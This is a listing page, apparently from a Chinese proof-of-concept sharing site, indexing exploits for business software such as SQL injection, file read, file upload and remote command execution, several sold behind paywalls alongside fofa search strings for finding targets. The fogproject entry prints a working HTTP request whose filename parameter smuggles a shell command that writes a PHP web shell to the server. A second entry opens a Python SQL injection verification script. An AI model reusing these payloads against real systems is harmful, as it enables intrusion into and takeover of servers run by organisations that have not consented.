POC_秃兔安全

更新

浏览

WX公众平台-无限回调系统 -SQL注入

2024你懂的

秃兔6个月前

0825

【通用】FREEDOM-Administration 默认密码漏洞

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2922个月前

0755

天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞

2024你懂的

秃兔6个月前

0635

广州图创-图书馆集群管理系统-PermissionAC

2024你懂的

秃兔6个月前

0605

【通用】电子图书阅读平台 downFile SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer2926个月前

0995

用友-畅捷通CRM-任意文件上传

2024你懂的

秃兔6个月前

0745

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

2024你懂的

秃兔6个月前

0515

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容

2024你懂的

秃兔6个月前

0815

【通用】龙腾码支付 payservicecurl 任意文件读取漏洞

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2921个月前

0575

华天动力-OA-downloadWpsFile任意文件读取

2024你懂的

秃兔6个月前

0805

上一页 1…41 424344 下一页跳转